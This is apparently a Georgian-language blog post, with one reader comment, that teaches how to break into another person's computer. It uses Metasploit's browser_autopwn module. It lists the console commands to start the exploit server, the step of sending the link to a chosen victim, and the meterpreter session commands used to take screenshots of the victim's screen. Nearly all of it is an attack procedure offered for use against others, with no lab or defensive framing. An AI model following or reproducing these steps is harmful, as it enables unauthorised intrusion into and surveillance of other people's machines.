მოგესალმებით ყველას,დღეს აგიხსნით თუ როგორ უნდა შევძვრეთ სხვის კომპიუტერში მეტასპლოიტის დახმარებით მაშ ასე დავიწყოთ :
ნაბიჯი #1 : უნდა გადმოვწეროთ მეტასპლოიტი )) გადმოწერა
ნაბიჯი #2 : ვაინსტალირებთ
ნაბიჯი #3 : გავხსნათ მეტასპლოიტის კონსოლი და დავიწყოთ :))
კონსოლი გამოიყურება დაახლოებით ესე :
ნაბიჯი #4 : კონსოლში ვწერ შემდეგ რამეს : use auxiliary/server/browser_autopwn
ნაბიჯი #5 : შემდეგ ვწერთ : set LHOST 192.168.1.1 <-- აქ უნდა ჩავწეროთ ჩვენი შიდა IP
ნაბიჯი #6 : შემდეგ ვწერთ : set LPORT 80 <-- porti დატოვეთ 80 ))
ნაბიჯი #7 : შემდეგ ვწერთ : set uripath /
ნაბიჯი #8 : და ბოლოს ვწერთ : exploit
ამის შემდეგ ბევრ რამეს დაწერს )) და დაველოდოთ ...
ამის შემდეგ იმას ვისი კომპიუტერის გატეხვაც გვინდა ვუგზავნით შემდეგ ლინკს :
http://192.168.1.107:8080 <--- ჩემ შემთხვევაში 192.168.1.107-ია შიდა IP თქვენ შემთხვევაში რაც იქნება ის უნდა გაუგზავნოთ მაგრამ გაითვალისწინეთ შიდა IP-ს ვიყენებთ მხოლოდ LAN -ში ხოლო თუ GLOBAL-ში გვინდა გარე IP უნდა ჩავწეროთ...
როდესაც მსხვერპლი ბრაუზერით შევა ჩვენს მიერ მიცემულ ლინკზე ჩვენი მეტასპლოიტი დაიწყებს ისევ რაღაცეების წერას და ბოლოს გაჩერდება და გვექნება ესეთი რამ : msf auxiliary(browser_autopwn) > და ეს როცა დაიწერება ამას უნდა მივუწეროთ ესეთი რამ : sessions -i 1.
თუ ყველაფერს ზუსტად შეასრულებთ და ყველაფერი გამოგივათ დაწერეს შემდეგ რაღაცას: meterpreter > ანუ უკვე მსხვერპლის კომპიუტერში იმყოფებით და მხოლოდ ერთი ბრძანებით შეგიძლიათ უკვე SCREEN-ი გამოაჩინოთ ეს ბრძანება არის : screenshoot
იმედია ყველაფერი გამოგივათ წარმატებებს გისურვებთ ;) პატივისცემით ./RoBBeR
roca vwer sessions -i 1 ese miwers da risi bralia?
ReplyDeletemsf auxiliary(browser_autopwn) > sessions -i 1
[-] Invalid session id
msf auxiliary(browser_autopwn) >